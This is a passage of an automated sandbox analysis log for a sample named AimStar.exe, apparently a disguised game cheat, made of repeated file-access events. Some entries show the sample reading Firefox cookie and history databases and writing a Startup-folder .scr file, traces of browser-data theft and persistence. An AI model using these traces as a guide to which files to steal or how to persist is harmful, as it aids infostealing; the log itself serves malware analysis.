              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI72842\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\Desktop\AimStar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
